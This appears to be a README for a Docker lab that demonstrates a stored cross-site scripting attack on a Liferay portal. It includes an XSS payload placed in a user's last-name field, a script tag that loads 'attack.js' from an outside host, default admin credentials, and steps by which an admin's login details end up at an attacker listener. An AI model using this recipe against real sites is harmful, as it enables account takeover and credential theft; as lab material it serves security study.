- docker
it's possible put the script attack online (given the js code ) http://yourjavascript.com/
Our Js script online for the attack
html <script src="http://yourjavascript.com/920172199111/attack.js"></script>
- go to root folder of this project
- run "sudo docker-compose up --build"
- new terminal: run "docker inspect liferay" ==> and copy the IPAddress value
- new terminal: run "python api_attacker.py"
- open a browser and go to "http://IPAddress:8080" ==> you should get the liferay portal as response
- to stop and delete containers use "sudo docker-compose rm"
- Register in liferay as a user, log in, and in the "available sites" section, join the "liferay" site.
- Change the "last name" in a JS script (directly (<script>alert("xss")</script>) or through a "src =" http ... "")
- Log in as admin liferay (username: test@liferay.com, password: test)
- Go to available sites and click on "liferay", the public page of this site will open.
- Go to the new page, a menu will open on the right, click on mermbership.
- Select the user registered in step 1. At that moment the script will be executed. 5.1) In the script attack.js the page will ask the credentials.
- In the terminal of step 5 ( of Commands for configuration) it will be printed username/password inserted in 5.1 ( by admin ) )